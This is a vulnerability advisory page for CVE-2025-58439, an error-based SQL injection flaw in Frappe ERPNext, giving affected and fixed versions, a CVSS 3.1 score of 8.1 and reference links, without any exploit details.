Error-Based SQL Injection Vulnerability in Frappe ERP Tool
CVE-2025-58439

8.1HIGH

Key Information:

Vendor

Frappe

Status
Erpnext
Vendor
CVE Published:
6 September 2025

What is CVE-2025-58439?

In Frappe ERP versions prior to 14.89.2 and from 15.0.0 to 15.75.1, the application did not adequately validate parameters for certain endpoints. This oversight allowed for error-based SQL Injection attacks, enabling unauthorized access to sensitive information such as application version details. Users are advised to update to versions 14.89.2 or 15.76.0 to mitigate the risk associated with this vulnerability.

Affected Version(s)

erpnext >=15.0.0, < 15.76.0 < 15.0.0, 15.76.0

erpnext < 14.89.2 < 14.89.2

References

https://github.com/frappe/erpnext/security/advisories/GHS...
x_refsource_CONFIRM
https://github.com/frappe/erpnext/pull/49219
x_refsource_MISC
https://github.com/frappe/erpnext/pull/49220
x_refsource_MISC

CVSS V3.1

Score:
8.1
Severity:
HIGH
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
Low
User Interaction:
None
Scope:
Unchanged

Timeline

  • Vulnerability published

  • Vulnerability Reserved

.